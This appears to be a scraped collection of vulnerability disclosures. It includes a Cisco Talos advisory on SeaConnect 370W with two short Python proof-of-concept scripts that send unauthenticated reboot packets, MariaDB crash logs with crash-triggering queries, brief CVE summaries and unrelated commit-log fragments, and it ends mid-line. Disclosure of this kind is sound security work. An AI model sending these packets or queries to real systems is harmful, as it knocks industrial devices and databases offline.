A denial of service vulnerability exists in the Modbus configuration functionality of Sealevel Systems, Inc. SeaConnect 370W v1.3.34. Specially-crafted network packets can lead to denial of service. An attacker can send a malicious packet to trigger this vulnerability.

**Summary**

Two denial of service vulnerabilities exist in the Modbus/SeaMAX Remote Configuration functionality of Sealevel Systems, Inc. SeaConnect 370W v1.3.34. Specially-crafted network packets can lead to denial of service. An attacker can send a malicious packet to trigger these vulnerabilities.

**Tested Versions**

Sealevel Systems, Inc. SeaConnect 370W v1.3.34

**Product URLs**

SeaConnect 370W - https://www.sealevel.com/product/370w-a-wifi-to-form-c-relays-digital-inputs-a-d-inputs-and-1-wire-bus-seaconnect-multifunction-io-edge-module-powered-by-seacloud/

**CVSSv3 Score**

8.6 - CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:H

**CWE**

CWE-284 - Improper Access Control

**Details**

The SeaConnect 370W is a Wi-Fi connected IIoT device offering programmable cloud access and control of digital and analog I/O and a 1-wire bus.

This device offers remote control via several means including MQTT, Modbus TCP and a manufacturer-specific protocol named “SeaMAX API”.

The device is built on top of the TI CC3200 MCU with built-in Wi-Fi capabilities.

The SeaConnect 370W can be configured through multiple independent means: HTTP, Modbus and the SeaMAX Ethernet API. Of these configuration interfaces, only the HTTP interface is enabled by default, and it is also the only one that enforces any level of authentication. Both the Modbus and SeaMAX Ethernet API interfaces are accessible via unauthenticated network requests (Modbus via TCP 502, SeaMAX Ethernet API via UDP 30718) when they are enabled. Certain modifications to the device settings require a reboot before taking effect, and so each method provides a mechanism to reboot the device. An attacker with network access to either of these ports can consistently render the device unusable by sending a properly formatted ‘Reboot’ request packet.

**CVE-2021-21964 - Unauthenticated Modbus Interface**

When the Modbus service has been enabled, a socket is bound to TCP port 502, and properly formatted Modbus requests are dispatched to a function located at offset 0x121B4, which we have titled DispatchModbusRequest. This function takes as its parameters a pointer to the Unit Identifier field of the MBAP header (located one byte ahead of the PDU) and the value of the length field provided in the MBAP. On top of the standard Modbus function codes, this device has support for several proprietary function codes as well, which can be seen below.

    int __fastcall DispatchModbusRequest(char *buffer, int buffer_len)
    {
      int fcode; // r0
    
      if ( buffer_len < 2 )
        return 0;
    
      fcode = buffer[1];
    
      switch (fcode)
      {
          case 0x01:
              return mbReadCoil(buffer, buffer_len);
          case 0x02:
              return mbReadDiscreteInput(buffer, buffer_len);
          case 0x03:
              return mbReadHoldingRegisters(buffer);
          case 0x04:
              return mbReadInputRegisters(buffer, buffer_len);
          case 0x05:
              return mbWriteSingleCoil(buffer, buffer_len);
          case 0x06:
              return mbWriteSingleHoldingRegister(buffer, buffer_len);
          case 0x0F:
              return mbWriteMultipleCoils(buffer, buffer_len);
          case 0x13:
              Reboot();  // noreturn
          case 0x45:
              return mbHandleFunction45(buffer);
          case 0x48:
              return mbChangeMacAddress(buffer, buffer_len);
          case 0x64:
              return mbWriteAnalogInputModes(buffer, buffer_len);
          case 0x65:
              return mbReadAnalogInputModes(buffer);
          case 0x66:
              return mbGetFirmwareVersion(buffer);
          default:
              return ModbusError(buffer, 1);
      }
    }
    

For this device, the modbus server provides access to manipulate or view the status of digital inputs and outputs, analog input readings and their operation modes, the device’s MAC address and firmware versions, as well as issue a Reboot request.

In order to render this device relatively unusable, an attacker need only issue Modbus requests for function 0x13 every time it sees the device reconnect to the network.

**Exploit Proof of Concept**

    import socket
    s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    s.connect(('<target>', 502))
    s.send(b'\x00\x00\x00\x00\x00\x02\x00\x13')
    

**CVE-2021-21965 - Unauthenticated SeaMAX Ethernet API**

The SeaMAX Ethernet API can also be used for device configuration. Commonly, this interaction will occur from within the provided SeaLevel software (“SeaMAX Ethernet Configuration” and “MaxSSD”) or from software built using the SeaMAX SDK. The SeaMAX Ethernet API is exposed on UDP port 30718 and is rather straightforward. Included below are the relevant portions of the function responsible for parsing and dispatching incoming requests. The portions we care about are contained within what we’ve termed the RUN state.

    void HandleSeaMAXAPIRequest()
    {
      ...
      switch (global_SeaMAXAPI_State) {
          case INIT:
            // Initialization of global_SeaMAXAPI_Socket, bound to UDP 30718
            ...
            break;
            
          case RUN:
            buffer = global_SeaMAX_recv_buffer;
            length = recvfrom(global_SeaMAXAPI_Socket, buffer, 150, 0, &src_addr, &addrlen);
            if ( length > 0 ) {
              if ( length >= 4 && !buffer[0] && !buffer[2]) {
                // Packet must be 4 bytes or larger, and the 0th and 2nd bytes *must* be 0x00
                switch ( buffer[3] )  // Function Code is the 3rd byte
                {
                  case 0xC0:
                    HandleWriteSetupRecord0(buffer, sock, &from);
                    break;
                  case 0xC3:
                    HandleWriteSetupRecord3(buffer, sock, &from);
                    break;
                  case 0xE0:
                    HandleQuerySetupRecord0(buffer, sock, &from);
                    break;
                  case 0xE3:
                    HandleQuerySetupRecord3(buffer, sock, &from);
                    break;
                  case 0xF6:
                    HandleFwVersionRequest(buffer, sock, &from);
                    break;
                  default:
                    Report("E: UNKNOWN(buffer[3] = 0x%02X, length=%d)\r\n", buffer[3], length);
                    break;
                }
              }
            }
            break;
    
          case STOP:
            // Tear down global_SeaMAXAPI_Socket
            ...
            break;
      }
      ...
    }
    

For a request to be appropriately dispatched, it must meet a handful of requirements: 1. It must be at least four bytes long 2. The 0th and 2nd bytes must be null 3. The 3rd byte must be one of {0xC0, 0xC3, 0xE0, 0xE3}

In particular, the HandleWriteSetupRecord0 and HandleWriteSetupRecord3 allow a remote user to configure settings such as device name, static IP address, DHCP options, etc. If the configuration change made by the remote user necessitates a device reboot, then the first byte of the request will be set to zero as well.

As a reference, we include a decompilation of the HandleWriteSetupRecord3 function.

    void HandleWriteSetupRecord3(char *buffer, int sockfd, SlInAddr_t *from_addr)
    {
      if ( IsSeaMAXEthernetAPIEnabled() ) {
        Report("I: Write Setup Record 3\r\n");
        buffer[3] = 0xB3;  // buffer is edited in place to serve as the response buffer, so set the 'response' code to 0xC3 - 0x10
        memset(global_DeviceName[2], '\0', 8);  // Empty the device name field, after the first type bytes ('SL')
        memcpy(global_DeviceName[2], buffer[106], 7);  // Copy the new device name out of the request
        global_DeviceNameHasChanged = 1;
        SetDeviceName();
        sendto(sockfd, buffer, 4, 0, &from_addr, 4);
        ...  // Error handling related to sendto failures
        if ( !buffer[1] )
            Reboot();
      }
    }
    

Note the final conditional check, where the first byte (zero-indexed) of the packet is checked to see if a reboot has been requested.

Similar to the modbus reboot function, a remote attacker can render a device relatively unusable by submitting properly-formed SeaMAX requests that will cause the device to reboot. Similarly, an attacker could potentially make breaking changes to a device’s network configuration, such as enabling or disabling DHCP.

**Exploit Proof of Concept**

    import socket
    s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
    s.sendto(b'\x00\x00\x00\xC3', ('<target_ip>', 30718))
    

**Timeline**

2021-10-21 - Initial vendor contact  
2021-10-26 - Vendor disclosure  
2022-02-01 - Public Release  

Discovered by Francesco Benvenuto and Matt Wiseman of Cisco Talos.

CVE-2021-21964: TALOS-2021-1392 || Cisco Talos Intelligence Group

options.c in atftp before 0.7.5 reads past the end of an array, and consequently discloses server-side /etc/group data to a remote client.

Help Create Join Login

Open Source Software

Business Software

Resources

*   Blog
*   Articles

Menu

*   Help
*   Create
*   Join
*   Login

*   Home
*   Browse
*   atftp
*   Code

**advanced tftp server and client**

Brought to you by: khorniszon, md11

*   Summary
*   Files
*   Reviews
*   Support
*   Wiki
*   Tickets ▾
    *   Support Requests
    *   Bugs
*   Code

Menu ▾ ▴

*   Browse Commits
*   Fork
*   Merge Requests 0
*   Forks 5

**Branches**

*   master
*   testing-generated-content-patch

**Tags**

*   0.7.dfsg
*   0.7.dfsg-6
*   0.7.dfsg-9.1
*   0.7.dfsg-9.3
*   v0.7.1
*   v0.7.2
*   v0.7.3
*   v0.7.4
*   v0.7.5
*   v0.8.0

**Commit \[9cf799\]  Maximize  Restore  History**

options.c: Proper fix for the read-past-end-of-array

This properly fixes what commit:b3e36dd tried to do.

Authored by:  Simon Rettberg 2018-01-10

Committed by:  Martin Dummer 2021-09-12

Browse code at this revision

Parent: \[536633\]

Child: \[6d2ff0\]

changed

options.c

**options.c Diff Switch to side-by-side view**

Oh no! Some styles failed to load. 😵 Please try reloading this page

CVE-2021-46671: atftp / Code

The check_privacy_settings AJAX action of the WordPress GDPR WordPress plugin before 1.9.27, available to both unauthenticated and authenticated users, responds with JSON data without an "application/json" content-type. Since an HTML payload isn't properly escaped, it may be interpreted by a web browser led to this endpoint. Javascript code may be executed on a victim's browser. Due to v1.9.26 adding a CSRF check, the XSS is only exploitable against unauthenticated users (as they all share the same nonce)

CVE-2022-0220

iTunesRPC-Remastered is a discord rich presence application for use with iTunes & Apple Music. In code before commit 24f43aa user input is not properly sanitized and code injection is possible. Users are advised to upgrade as soon as is possible. There are no known workarounds for this issue.

**Impact**

_What kind of vulnerability is it? Who is impacted?_  
This vulnerability is a XSS and Improper Encoding vulnerability. AFAIK, only servers are impacted.

**Patches**

_Has the problem been patched? What versions should users upgrade to?_  
_No patches have been released yet._  
As of commit 24f43aa, the issue **has** been fixed. No official releases are affected. Commits 7f9dd66, b39ad02, 96cc9f2, 4d0f88b, c29b3c8, 953fd83, 355a474, and 54b02d9 are all still vulnerable.

**Workarounds**

_Is there a way for users to fix or remediate the vulnerability without upgrading?_  
Users can manually add escaping to the server and client, or upgrade to commit 24f43aa.

**For more information**

If you have any questions or comments about this advisory:

*   Email us at report.app.vulnerability@bildsben.tech

CVE-2022-23603: Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') and Improper Encoding or Escaping of Output in server.py

MariaDB through 10.5.9 allows an application crash in sub_select_postjoin_aggr for a NULL value of aggr.

This could be because you hit a bug. It is also possible that this binary

or one of the libraries it was linked against is corrupt, improperly built,

or misconfigured. This error can also be caused by malfunctioning hardware.

To report this bug, see https://mariadb.com/kb/en/reporting-bugs

We will try our best to scrape up some info that will hopefully help

diagnose the problem, but since we have already crashed,

something is definitely wrong and this may fail.

Server version: 10.5.9-MariaDB

key\_buffer\_size=134217728

read\_buffer\_size=131072

max\_used\_connections=2

max\_threads=153

thread\_count=2

It is possible that mysqld could use up to

key\_buffer\_size + (read\_buffer\_size + sort\_buffer\_size)\*max\_threads = 467864 K  bytes of memory

Hope that's ok; if not, decrease some variables in the equation.

Thread pointer: 0x62b0003aa218

Attempting backtrace. You can use the following information to find out

where mysqld died. If you see no messages after this, something went

terribly wrong...

stack\_bottom = 0x7f5164121600 thread\_stack 0x5fc00

/usr/local/mysql/bin/mariadbd(\_\_interceptor\_backtrace+0x5b)\[0x917bfb\]

:0(mi\_state\_info\_read)\[0x6ad5ad8\]

sql/sql\_yacc.cc:46457(MYSQLparse(THD\*))\[0x2beef02\]

sigaction.c:0(\_\_restore\_rt)\[0x7f518fcf13c0\]

sql/sql\_parse.cc:0(execute\_sqlcom\_select(THD\*, TABLE\_LIST\*))\[0x17847aa\]

sql/sql\_lex.cc:11194(LEX::stmt\_alter\_procedure\_start(sp\_name\*))\[0x1656121\]

sql/sql\_parse.cc:6294(execute\_sqlcom\_select(THD\*, TABLE\_LIST\*))\[0x17877dd\]

??:0(Item\_func\_trim\_oracle::Item\_func\_trim\_oracle(THD\*, Item\*, Item\*))\[0x1687930\]

sql/item\_cmpfunc.h:3452(Item\_func\_cursor\_isopen)\[0x167fc53\]

sql/sql\_explain.h:350(Explain\_union)\[0x1676897\]

sql/sql\_select.cc:9737(best\_extension\_by\_limited\_search(JOIN\*, unsigned long long, unsigned int, double, double, unsigned int, unsigned int, unsigned int))\[0x1c19a34\]

??:0(cmp\_item\_int::cmp(Item\*))\[0x33658c1\]

??:0(Item\_func\_in::mark\_as\_condition\_AND\_part(TABLE\_LIST\*))\[0x32f5c99\]

??:0(Item\_cond\_and::val\_int())\[0x33080b9\]

sql/field.cc:5397(Field\_timestamp::val\_str(String\*, String\*))\[0x2e73cef\]

sql/field.h:3309(Field\_timestamp\_hires::size\_of() const)\[0x2f4f45a\]

??:0(Field\_time0::get\_date(st\_mysql\_time\*, date\_mode\_t))\[0x2e96d3a\]

sql\_show.cc:0(show\_create\_view(THD\*, TABLE\_LIST\*, String\*))\[0x1cca61c\]

??:0(Rotate\_log\_event::do\_update\_pos(rpl\_group\_info\*))\[0x3b1d4b5\]

??:0(Load\_log\_event::do\_apply\_event(st\_net\*, rpl\_group\_info\*, bool))\[0x3b136ce\]

??:0(THD::THD(unsigned long long, bool))\[0x1355914\]

??:0(Query\_cache::store\_query(THD\*, TABLE\_LIST\*))\[0x1308593\]

??:0(Query\_cache::lock\_and\_suspend())\[0x12f7243\]

??:0(Query\_cache::is\_cacheable(THD\*, LEX\*, TABLE\_LIST\*, unsigned char\*))\[0x130cd19\]

??:0(st\_select\_lex\_unit::cleanup())\[0x2023c1d\]

??:0(st\_select\_lex\_unit::cleanup())\[0x202215d\]

maria/ma\_write.c:402(maria\_write)\[0x46e90f3\]

nptl/pthread\_create.c:478(start\_thread)\[0x7f518fce5609\]

??:0(clone)\[0x7f518f057293\]

Trying to get some variables.

Some pointers may be invalid and cause the dump to abort.

Query (0x62b0003b1238): delete from t\_ykc

where

t\_ykc.c\_o2btif85c = (

  select distinct

        t\_ykc.c\_o2btif85c as c0

      from

        (t\_c2lhzj as ref\_0

          cross join t\_c2lhzj as ref\_1

          )

    union all

    select distinct

        52 as c0

      from

        t\_c2lhzj as ref\_2

      where t\_ykc.c\_o2btif85c >= t\_ykc.c\_o2btif85c)

Connection ID (thread ID): 171

Status: NOT\_KILLED

Optimizer switch: index\_merge=on,index\_merge\_union=on,index\_merge\_sort\_union=on,index\_merge\_intersection=on,index\_merge\_sort\_intersection=off,engine\_condition\_pushdown=off,index\_condition\_pushdown=on,derived\_merge=on,derived\_with\_keys=on,firstmatch=on,loosescan=on,materialization=on,in\_to\_exists=on,semijoin=on,partial\_match\_rowid\_merge=on,partial\_match\_table\_scan=on,subquery\_cache=on,mrr=off,mrr\_cost\_based=off,mrr\_sort\_keys=off,outer\_join\_with\_cache=on,semijoin\_with\_cache=on,join\_cache\_incremental=on,join\_cache\_hashed=on,join\_cache\_bka=on,optimize\_join\_buffer\_size=on,table\_elimination=on,extended\_keys=on,exists\_to\_in=on,orderby\_uses\_equalities=on,condition\_pushdown\_for\_derived=on,split\_materialized=on,condition\_pushdown\_for\_subquery=on,rowid\_filter=on,condition\_pushdown\_from\_having=on,not\_null\_range\_scan=off

The manual page at https://mariadb.com/kb/en/how-to-produce-a-full-stack-trace-for-mysqld/ contains

information that should help you find out what is causing the crash.

Writing a core file...

Working directory at /usr/local/mysql/data

Resource Limits:

Limit                     Soft Limit           Hard Limit           Units

Max cpu time              unlimited            unlimited            seconds

Max file size             unlimited            unlimited            bytes

Max data size             unlimited            unlimited            bytes

Max stack size            8388608              unlimited            bytes

Max core file size        0                    0                    bytes

Max resident set          unlimited            unlimited            bytes

Max processes             79624                79624                processes

Max open files            1048576              1048576              files

Max locked memory         67108864             67108864             bytes

Max address space         unlimited            unlimited            bytes

Max file locks            unlimited            unlimited            locks

Max pending signals       79624                79624                signals

Max msgqueue size         819200               819200               bytes

Max nice priority         0                    0

Max realtime priority     0                    0

Max realtime timeout      unlimited            unlimited            us

Core pattern: core

CVE-2021-46664: [MDEV-25761] Assertion `aggr != __null' failed in sub_select_postjoin_aggr

MariaDB through 10.5.9 allows an application crash in find_field_in_tables and find_order_in_list via an unused common table expression (CTE).

This could be because you hit a bug. It is also possible that this binary

or one of the libraries it was linked against is corrupt, improperly built,

or misconfigured. This error can also be caused by malfunctioning hardware.

To report this bug, see https://mariadb.com/kb/en/reporting-bugs

We will try our best to scrape up some info that will hopefully help

diagnose the problem, but since we have already crashed,

something is definitely wrong and this may fail.

Server version: 10.5.9-MariaDB

key\_buffer\_size=134217728

read\_buffer\_size=131072

max\_used\_connections=2

max\_threads=153

thread\_count=2

It is possible that mysqld could use up to

key\_buffer\_size + (read\_buffer\_size + sort\_buffer\_size)\*max\_threads = 467864 K  bytes of memory

Hope that's ok; if not, decrease some variables in the equation.

Thread pointer: 0x62b00007e218

Attempting backtrace. You can use the following information to find out

where mysqld died. If you see no messages after this, something went

terribly wrong...

stack\_bottom = 0x7f26a2226600 thread\_stack 0x5fc00

/usr/local/mysql/bin/mariadbd(\_\_interceptor\_backtrace+0x5b)\[0x917bfb\]

:0(mi\_state\_info\_read)\[0x6ad5ad8\]

sql/sql\_yacc.cc:46457(MYSQLparse(THD\*))\[0x2beef02\]

sigaction.c:0(\_\_restore\_rt)\[0x7f26c1a133c0\]

sql/protocol.h:0(Protocol\_text)\[0xe8530c\]

sql/sql\_lex.cc:1164(Lex\_input\_stream::add\_digest\_token(unsigned int, YYSTYPE\*))\[0x1567533\]

sql/sql\_parse.cc:8709(st\_select\_lex::add\_cross\_joined\_table(TABLE\_LIST\*, TABLE\_LIST\*, bool))\[0x17aeebc\]

??:0(Lex\_input\_stream::body\_utf8\_append(char const\*, char const\*))\[0x1564878\]

sql/sql\_lex.cc:120(sp\_expr\_lex::case\_stmt\_action\_when(bool))\[0x155372f\]

sql\_select.cc:0(change\_cond\_ref\_to\_const(THD\*, I\_List<COND\_CMP>\*, Item\*, Item\*, Item\_bool\_func2\*, Item\*, Item\*))\[0x1c45226\]

sql\_select.cc:0(trace\_table\_dependencies(THD\*, st\_join\_table\*, unsigned int))\[0x1c05a9e\]

??:0(JOIN\_CACHE::create\_remaining\_fields())\[0x260f8eb\]

??:0(JOIN\_CACHE::create\_remaining\_fields())\[0x260ee4d\]

??:0(LEX::create\_item\_for\_sp\_var(Lex\_ident\_cli\_st const\*, sp\_variable\*))\[0x15571b6\]

??:0(select\_create::abort\_result\_set())\[0x1536385\]

sql/sql\_insert.cc:5068(select\_create::abort\_result\_set())\[0x1534614\]

sql/sql\_class.cc:2550(THD::make\_string\_literal\_charset(Lex\_string\_with\_metadata\_st const&, charset\_info\_st const\*))\[0x1386f2f\]

sql/sql\_cache.cc:4324(Query\_cache::move\_by\_type(unsigned char\*\*, Query\_cache\_block\*\*, unsigned long\*, Query\_cache\_block\*))\[0x133cf2d\]

??:0(Query\_cache::store\_query(THD\*, TABLE\_LIST\*))\[0x1308593\]

??:0(Query\_cache::lock\_and\_suspend())\[0x12f7243\]

??:0(Query\_cache::is\_cacheable(THD\*, LEX\*, TABLE\_LIST\*, unsigned char\*))\[0x130cd19\]

??:0(st\_select\_lex\_unit::cleanup())\[0x2023c1d\]

??:0(st\_select\_lex\_unit::cleanup())\[0x202215d\]

maria/ma\_write.c:402(maria\_write)\[0x46e90f3\]

nptl/pthread\_create.c:478(start\_thread)\[0x7f26c1a07609\]

??:0(clone)\[0x7f26c0d79293\]

Trying to get some variables.

Some pointers may be invalid and cause the dump to abort.

Query (0x62b000085238): WITH

jennifer\_0 AS (select

    subq\_0.c4 as c6

  from

    ((select

            11 as c4

          from

            t\_wk as ref\_0

     ) as subq\_0

      left outer join t\_wk as ref\_2

      on (11 <> 19))

)

select

    subq\_2.c2 as c4

  from

    (select distinct

          61 as c2

        from

          t\_ykc as ref\_13

        ) as subq\_2

Connection ID (thread ID): 637

Status: NOT\_KILLED

Optimizer switch: index\_merge=on,index\_merge\_union=on,index\_merge\_sort\_union=on,index\_merge\_intersection=on,index\_merge\_sort\_intersection=off,engine\_condition\_pushdown=off,index\_condition\_pushdown=on,derived\_merge=on,derived\_with\_keys=on,firstmatch=on,loosescan=on,materialization=on,in\_to\_exists=on,semijoin=on,partial\_match\_rowid\_merge=on,partial\_match\_table\_scan=on,subquery\_cache=on,mrr=off,mrr\_cost\_based=off,mrr\_sort\_keys=off,outer\_join\_with\_cache=on,semijoin\_with\_cache=on,join\_cache\_incremental=on,join\_cache\_hashed=on,join\_cache\_bka=on,optimize\_join\_buffer\_size=on,table\_elimination=on,extended\_keys=on,exists\_to\_in=on,orderby\_uses\_equalities=on,condition\_pushdown\_for\_derived=on,split\_materialized=on,condition\_pushdown\_for\_subquery=on,rowid\_filter=on,condition\_pushdown\_from\_having=on,not\_null\_range\_scan=off

The manual page at https://mariadb.com/kb/en/how-to-produce-a-full-stack-trace-for-mysqld/ contains

information that should help you find out what is causing the crash.

Writing a core file...

Working directory at /usr/local/mysql/data

Resource Limits:

Limit                     Soft Limit           Hard Limit           Units

Max cpu time              unlimited            unlimited            seconds

Max file size             unlimited            unlimited            bytes

Max data size             unlimited            unlimited            bytes

Max stack size            8388608              unlimited            bytes

Max core file size        0                    0                    bytes

Max resident set          unlimited            unlimited            bytes

Max processes             79624                79624                processes

Max open files            1048576              1048576              files

Max locked memory         67108864             67108864             bytes

Max address space         unlimited            unlimited            bytes

Max file locks            unlimited            unlimited            locks

Max pending signals       79624                79624                signals

Max msgqueue size         819200               819200               bytes

Max nice priority         0                    0

Max realtime priority     0                    0

Max realtime timeout      unlimited            unlimited            us

Core pattern: core

CVE-2021-46661: [MDEV-25766] Unused CTE lead to a crash in find_field_in_tables/find_order_in_list

MariaDB through 10.5.9 allows an application crash via certain long SELECT DISTINCT statements that improperly interact with storage-engine resource limitations for temporary data structures.

I used my fuzzing tool to test Mariadb , and found a bug that can result in an abortion.

**Mariadb installation：**  
1) cd mariadb-10.5.9  
2) mkdir build; cd build  
3) cmake -DWITH\_ASAN=ON -DWITH\_ASAN\_SCOPE=ON -DWITH\_DEBUG=ON ../  
4) make -j8 && sudo make install

**How to Repeat:**  
export ASAN\_OPTIONS=detect\_leaks=0  
/usr/local/mysql/bin/mysqld\_safe &  
/usr/local/mysql/bin/mysql -uroot -p123456(your password)  
MariaDB> drop database if exists test\_db;  
MariaDB> create database test\_db;  
MariaDB> source fuzz.sql;

I have simplified the content of fuzz.sql, and I hope fuzz.sql can help you reproduce the bug and fix it. In addition, I attach the abortion report (which has its stack trace).

CVE-2021-46668: [MDEV-25787] Bug report: crash on SELECT DISTINCT thousands_blob_fields

xterm through Patch 370, when Sixel support is enabled, allows attackers to trigger a buffer overflow in set_sixel in graphics_sixel.c via crafted text.

CVE-2022-24130: XTERM - Change Log

An OScommand injection vulnerability exists in the device network settings functionality of reolink RLC-410W v3.0.0.136_20121102. At [8] the devname variable, that has the value of the name parameter provided through the SetDevName API, is not validated properly. This would lead to an OS command injection.

CVE-2021-40412

An issue was discovered in the DNS proxy in Connman through 1.40. The TCP server reply implementation has an infinite loop if no data is received.

AgeCommit message (Expand)AuthorFilesLines 12 dayswispr: Simplify the IP version checkHEADmasterDaniel Wagner1\-5/+1 12 dayswispr: Fix context refcounting in wispr\_portal\_request\_portal()Daniel Wagner1\-5/+5 12 daysservice: Track online check for IPv4 and IPv6 separatelyDaniel Wagner1\-12/+27 2022-08-28ipconfig: Don't add invalid gateway routesDaniel Wagner1\-1/+1 2022-08-28wisrp: Handle wispr\_portal\_detect failuresDaniel Wagner1\-24/+32 2022-08-28resolver: Add path to resolv.conf to config optionsJakub Jirutka3\-7/+48 2022-08-01AUTHORS: Mention Nathan's contributionsDaniel Wagner1\-0/+1 2022-08-01gweb: Fix OOB write in received\_data()Nathan Crandall1\-1/+1 2022-08-01wispr: Update portal context referencesDaniel Wagner1\-12/+22 2022-08-01wispr: Add reference counter to portal contextDaniel Wagner1\-10/+42 2022-08-01wispr: Ignore NULL proxyDaniel Wagner1\-1/+1 2022-08-01wispr: Rename wispr\_portal\_list to wispr\_portal\_hashDaniel Wagner1\-11/+11 2022-05-25wispr: Prevent use-after-free from \_\_connman\_wispr\_stop()Seung-Woo Kim1\-11/+5 2022-05-25doc: Add note SingleConnectedTechnology can't be used with VPNDaniel Wagner1\-1/+2 2022-05-16service: Add "Ethernet" property for VPN into n.c.Manager GetServicesJakub Jirutka1\-1/+1 2022-05-16clock: fix time update transition auto->manualRyan Smith1\-6/+3 2022-04-14wispr: Fix online check when using WPAD/PACRyan Smith1\-6/+30 2022-04-14dhcp: Set proxy properly when applying DHCP leaseRyan Smith1\-2/+1 2022-04-14gdhcp: fix server address byte orderRyan Smith1\-1/+1 2022-04-14iwd: Fix connection with invalid passphrase formatEmmanuel VAUTRIN1\-1/+3 2022-04-08AUTHORS: Mention Daniel's contributionsDaniel Wagner1\-0/+1 2022-04-08vpn: Replace hardcoded paths with RUNSTATEDIRDaniel Linjama2\-3/+3 2022-04-08build: Support configurable run dir with RUNSTATEDIRDaniel Linjama2\-0/+3 2022-04-08ofono: Do not change regdom when it follows timezoneJussi Laakkonen1\-0/+5 2022-04-08timezone: Change regdom along timezone, use localtime configJussi Laakkonen1\-5/+100 2022-04-08main: Add RegdomFollowsTimezone option for regdom changesJussi Laakkonen2\-0/+19 2022-04-08main: Add path to localtime to config options.Jussi Laakkonen2\-0/+22 2022-04-08timeserver: include the reason why a timeserver sync is requestedNicky Geerts4\-7/+35 2022-03-07timeserver: refresh the nameservers before each lookupNicky Geerts1\-41/+46 2022-03-04iwd: Forget network on service removalEmmanuel VAUTRIN5\-0/+58 2022-03-04dnsproxy: add standalone test version of dnsproxy and a test script for itMatthias Gerstner4\-1/+284 2022-02-27service: Check if hidden service has a pending request on agentJussi Laakkonen1\-1/+4 2022-02-27agent: Add support to check for active pending requestsJussi Laakkonen4\-0/+39 2022-02-27AUTHORS: Mention Sebastian's contributionsDaniel Wagner1\-0/+1 2022-02-27vpn/vpn-polkit.policy: Replace unsupported "auth\_\*\_keep\_session" by "auth\_\*\_k...Sebastian Pipping1\-2/+2 2022-02-27iwd: Fix disabling tethering not working for brcmfmacJonathan Liu1\-5/+4 2022-02-27main: Set default online check URL also when no config providedDaniel Wagner1\-2/+8 2022-02-21dnsproxy-test: support command line specification of dnsproxy portMatthias Gerstner1\-2/+9 2022-02-21dnsproxy: support programmatic configuration of the default listen portMatthias Gerstner2\-2/+9 2022-02-21.gitignore: also ignore emacs backup filesMatthias Gerstner1\-0/+1 2022-02-21dnsproxy: protocol\_offset: remove error return case and return size\_tMatthias Gerstner1\-27/+14 2022-02-21dnsproxy: remove unnecessarily shadowed variableMatthias Gerstner1\-1/+1 2022-02-21dnsproxy: remove unused domain parameter from \`remove\_server()\`Matthias Gerstner1\-4/+3 2022-02-21iwd: Use same signal strength calculation as wpa\_supplicantJonathan Liu1\-1/+3 2022-02-21iwd: Fix typo in warning message when enabling AccessPoint modeJonathan Liu1\-1/+1 2022-02-21wifi: Duplicate GSupplicantSSID pointer membersNiel Fourie2\-39/+83 2022-01-28Release 1.411.41Marcel Holtmann2\-1/+9 2022-01-25unit: Fix missing declarations in test-iptablesEmmanuel VAUTRIN1\-2/+2 2022-01-25AUTHORS: Add Matthias' contributionsDaniel Wagner1\-0/+1 2022-01-25dnsproxy: Keep timeout in TCP case even after connection is establishedMatthias Gerstner1\-5/+0 2022-01-25dnsproxy: Avoid 100 % busy loop in TCP server caseMatthias Gerstner1\-0/+12 2022-01-25dnsproxy: Validate input data before using themDaniel Wagner1\-5/+26 2022-01-25dnsproxy: Update TCP length headerMatthias Gerstner1\-0/+3 2022-01-25main: Use g\_strdup for online\_check\_ipv{4,6}\_url configDaniel Wagner1\-2/+9 2022-01-23service: Fix native connection with wrong passphraseEmmanuel VAUTRIN1\-0/+9 2022-01-21iwd: Mark only reachable networks as availableEmmanuel VAUTRIN1\-1/+3 2022-01-21iwd: Fix connection with no passphraseEmmanuel VAUTRIN1\-0/+2 2022-01-21iwd: Fix station in scan callbackVAUTRIN Emmanuel (Canal Plus Prestataire)1\-1/+1 2021-12-19AUTHORS: Mention Christian's contributionsDaniel Wagner1\-0/+1 2021-12-19ipconfig: Do not enable/disable ipv6 for all ifsChristian Taedcke1\-0/+6 2021-12-19Add ObjectManager interface to connmanMichael Trimarchi1\-1/+1 2021-11-18service: Support hot-plug of technologies by updating ipconfig indexJussi Laakkonen1\-2/+15 2021-11-18openvpn: Improve configuration value processingJussi Laakkonen1\-44/+76 2021-11-18vpn-provider: Support checking if provider setting key exists.Jussi Laakkonen2\-0/+8 2021-10-26tether: Fix connman\_technology\_get\_wifi\_tetheringMichael Trimarchi1\-2/+6 2021-10-20dnsproxy: Fix uninitialized false positive in dnsproxyEmmanuel VAUTRIN1\-1/+1 2021-10-20tools: Fix uninitialized errors in iptables testsEmmanuel VAUTRIN2\-2/+2 2021-10-20config: Cleanup of iwd provision\_service\_wifi()Emmanuel VAUTRIN1\-4/+2 2021-10-15gsupplicant: Fix error return typeDaniel Wagner1\-2/+2 2021-10-15inet: Remove unused ipv6\_addr\_advert\_multDaniel Wagner1\-7/+0 2021-10-15build: Only enable -Wcast-align for gccDaniel Wagner1\-1/+3 2021-10-15client: Update the connmactl to support optional tethering channelMichael Trimarchi1\-14/+46 2021-10-15tethering: Add TetheringFreq parameter documentationMichael Trimarchi1\-0/+7 2021-10-15tethering: Add possibility to configure the access point frequencyMichael Trimarchi5\-7/+52 2021-10-15tethering: Reduce the number of parameters of tech\_set\_tetheringMichael Trimarchi8\-32/+33 2021-10-04AUTHORS: Mention Michael's contributionsDaniel Wagner1\-0/+1 2021-10-04manager: Add TetheringClientsChanged GBUS\_SIGNALMichael Trimarchi1\-0/+3 2021-10-04service: Report errors to user in native modeVAUTRIN Emmanuel (Canal Plus Prestataire)1\-1/+2 2021-10-04iwd: Fix timeout error on new connectionVAUTRIN Emmanuel (Canal Plus Prestataire)1\-1/+1 2021-10-04iwd: Fix improper IPv4/6 attributes when disconnectingVAUTRIN Emmanuel (Canal Plus Prestataire)1\-0/+2 2021-10-04iwd: Fix missing Ethernet attributesVAUTRIN Emmanuel (Canal Plus Prestataire)1\-7/+8 2021-09-13doc: Document AuthErrorLimit in VPN connection APIJussi Laakkonen1\-0/+13 2021-09-13openvpn: Default to 10 AuthErrorLimit unless set by userJussi Laakkonen1\-0/+9 2021-09-13vpn-provider: Add auth error check heuristic to avoid losing credsJussi Laakkonen2\-0/+112 2021-09-13vpn-provider: Ignore error adding when state is idle/unknownJussi 